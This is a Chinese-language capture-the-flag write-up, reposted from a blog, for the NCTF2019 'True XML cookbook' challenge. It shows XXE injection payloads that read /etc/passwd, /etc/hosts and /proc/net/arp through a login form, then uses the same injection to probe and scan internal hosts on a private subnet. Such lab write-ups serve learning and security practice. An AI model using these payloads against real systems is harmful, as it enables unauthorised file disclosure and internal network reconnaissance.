[NCTF2019]True XML cookbook Writeup

2020-12-29 22:00:10 阅读：1576 来源： 互联网

标签：XML 读取回显 Writeup 扫描 xxe cookbook payload 注入

结合本题简要讲解一下xxe攻击

本篇文章默认读者了解Xml基本格式
在这里插入图片描述
首先我们看到一个登录界面，使用burp抓包看一下：

这里暴露出来很明显的xxe注入点。

我们开始构造payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "file:///etc/passwd"> 
]>
<user><username>&a;</username><password>a</password></user>

可以看到回显：
在这里插入图片描述
说明存在xxe注入

这里很关键的一个点在于考察，xxe其实可以用来打内网。

我们读取关键文件：/etc/hosts 和 /proc/net/arp。

payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "file:///etc/hosts"> 
]>
<user><username>&a;</username><password>a</password></user>

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "file:///proc/net/arp"> 
]>
<user><username>&a;</username><password>a</password></user>

回显分别是：
在这里插入图片描述

在这里插入图片描述
给了一个主机IP，读取一下：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "http://10.106.213.2/"> 
]>
<user><username>&a;</username><password>a</password></user>

在这里插入图片描述
直接报错，但没关系，我们可以进行C段扫描

扫描结果如下：在这里插入图片描述

即：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "http://10.106.213.11/"> 
]>
<user><username>&a;</username><password>a</password></user>

即可

考查知识点：

xxe注入攻击
xxe内网探测

难度：

简单

总结：

保持谦虚，继续学习

标签：XML,读取,回显,Writeup,扫描,xxe,cookbook,payload,注入
来源： https://blog.csdn.net/StevenOnesir/article/details/111937766

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

ICode9

[NCTF2019]True XML cookbook Writeup